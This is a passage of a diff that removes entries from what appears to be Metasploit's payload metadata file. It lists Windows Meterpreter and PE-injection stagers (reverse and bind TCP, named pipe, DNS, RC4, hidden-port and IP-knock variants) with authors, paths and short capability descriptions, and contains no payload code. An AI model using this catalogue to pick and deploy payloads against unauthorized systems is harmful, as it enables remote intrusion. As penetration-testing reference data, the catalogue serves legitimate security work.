+0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/patchupmeterpreter/reverse_nonx_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupmeterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "vlad902 " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/patchupmeterpreter/reverse_ord_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupmeterpreter/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "spoonm " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/patchupmeterpreter/reverse_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_allports": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_dns": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_rc4": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_rc4_dns": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_uuid": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/peinject/bind_hidden_ipknock_tcp": { - "name": "Windows Inject PE Files, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/peinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\n\n Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode", - "references": [ - "URL-https://github.com/EgeBalci/Amber", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/peinject/bind_hidden_tcp": { - "name": "Windows Inject PE Files, Hidden Bind TCP Stager", - "fullname": "payload/windows/peinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/EgeBalci/Amber", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/peinject/bind_ipv6_tcp": { - "name": "Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/peinject/bind_ipv6_tcp_uuid": { - "name": "Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/peinject/bind_named_pipe": { - "name": "Windows Inject PE Files, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "UserExistsError" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/peinject/bind_nonx_tcp": { - "name": "Windows Inject PE Files, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/peinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "vlad902 " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/peinject/bind_tcp": { - "name": "Windows Inject PE Files, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/peinject/bind_tcp_rc4": { - "name": "Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/peinject/bind_tcp_uuid": { - "name": "Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/peinject/find_tag": { - "name": "Windows Inject PE Files, Find Tag Ordinal Stager", - "fullname": "payload/windows/peinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "skape " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nUse an established connection", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/peinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/peinject/reverse_ipv6_tcp": { - "name": "Windows Inject PE Files, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/peinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/peinject/reverse_named_pipe": { - "name": "Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_windows/peinject/reverse_nonx_tcp": { - "name": "Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/peinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "vlad902 " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/peinject/reverse_ord_tcp": { - "name": "Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/peinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "spoonm " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/peinject/reverse_tcp": { - "name": "Windows Inject PE Files, Reverse TCP Stager", - "fullname": "payload/windows/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/peinject/reverse_tcp_allports": { - "name": "Windows Inject PE Files, Reverse All-Port TCP Stager", - "fullname": "payload/windows/peinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/peinject/reverse_tcp_dns": { - "name": "Windows Inject PE Files, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/peinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - 